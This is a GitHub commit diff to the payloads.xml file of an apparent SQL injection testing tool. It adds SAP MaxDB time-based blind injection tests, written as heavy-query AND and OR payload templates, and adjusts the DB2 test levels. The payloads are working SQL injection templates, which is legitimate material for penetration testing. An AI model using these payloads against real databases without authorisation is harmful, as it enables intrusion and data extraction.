You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Copy file name to clipboardExpand all lines: xml/payloads.xml
+62-4Lines changed: 62 additions & 4 deletions
Original file line number
Diff line number
Diff line change
@@ -2196,10 +2196,49 @@ Formats:
2196
2196
</details>
2197
2197
</test>
2198
2198
2199
+
<test>
2200
+
<title>SAP MaxDB AND time-based blind (heavy query)</title>
2201
+
<stype>5</stype>
2202
+
<level>3</level>
2203
+
<risk>2</risk>
2204
+
<clause>1,2,3</clause>
2205
+
<where>1</where>
2206
+
<vector>AND [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1, (SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2, (SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>
2207
+
<request>
2208
+
<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1, DOMAIN.COLUMNS AS T2, DOMAIN.TABLES AS T3)</payload>
2209
+
</request>
2210
+
<response>
2211
+
<time>[DELAYED]</time>
2212
+
</response>
2213
+
<details>
2214
+
<dbms>SAP MaxDB</dbms>
2215
+
</details>
2216
+
</test>
2217
+
2218
+
<test>
2219
+
<title>SAP MaxDB AND time-based blind (heavy query - comment)</title>
2220
+
<stype>5</stype>
2221
+
<level>5</level>
2222
+
<risk>2</risk>
2223
+
<clause>1,2,3</clause>
2224
+
<where>1</where>
2225
+
<vector>AND [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1, (SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2, (SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>
2226
+
<request>
2227
+
<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1, DOMAIN.COLUMNS AS T2, DOMAIN.TABLES AS T3)</payload>
2228
+
<comment>--</comment>
2229
+
</request>
2230
+
<response>
2231
+
<time>[DELAYED]</time>
2232
+
</response>
2233
+
<details>
2234
+
<dbms>SAP MaxDB</dbms>
2235
+
</details>
2236
+
</test>
2237
+
2199
2238
<test>
2200
2239
<title>DB2 AND time-based blind (heavy query)</title>
2201
2240
<stype>5</stype>
2202
-
<level>2</level>
2241
+
<level>3</level>
2203
2242
<risk>2</risk>
2204
2243
<clause>1,2,3</clause>
2205
2244
<where>1</where>
@@ -2234,7 +2273,7 @@ Formats:
2234
2273
<dbms>DB2</dbms>
2235
2274
</details>
2236
2275
</test>
2237
-
<!-- TODO: if possible, add payload for Microsoft Access and SAP MaxDB -->
2276
+
<!-- TODO: if possible, add payload for Microsoft Access -->
2238
2277
<!-- End of AND time-based blind tests -->
2239
2278
2240
2279
@@ -2416,10 +2455,29 @@ Formats:
2416
2455
</details>
2417
2456
</test>
2418
2457
2458
+
<test>
2459
+
<title>SAP MaxDB OR time-based blind (heavy query - comment)</title>
2460
+
<stype>5</stype>
2461
+
<level>4</level>
2462
+
<risk>3</risk>
2463
+
<clause>1,2,3</clause>
2464
+
<where>2</where>
2465
+
<vector>OR [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1, (SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2, (SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>
2466
+
<request>
2467
+
<payload>OR [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1, DOMAIN.COLUMNS AS T2, DOMAIN.TABLES AS T3)</payload>
2468
+
</request>
2469
+
<response>
2470
+
<time>[DELAYED]</time>
2471
+
</response>
2472
+
<details>
2473
+
<dbms>SAP MaxDB</dbms>
2474
+
</details>
2475
+
</test>
2476
+
2419
2477
<test>
2420
2478
<title>DB2 OR time-based blind (heavy query)</title>
2421
2479
<stype>5</stype>
2422
-
<level>3</level>
2480
+
<level>4</level>
2423
2481
<risk>3</risk>
2424
2482
<clause>1,2,3</clause>
2425
2483
<where>2</where>
@@ -2434,7 +2492,7 @@ Formats:
2434
2492
<dbms>DB2</dbms>
2435
2493
</details>
2436
2494
</test>
2437
-
<!-- TODO: if possible, add payload for Microsoft Access and SAP MaxDB -->
2495
+
<!-- TODO: if possible, add payload for Microsoft Access -->
0 commit comments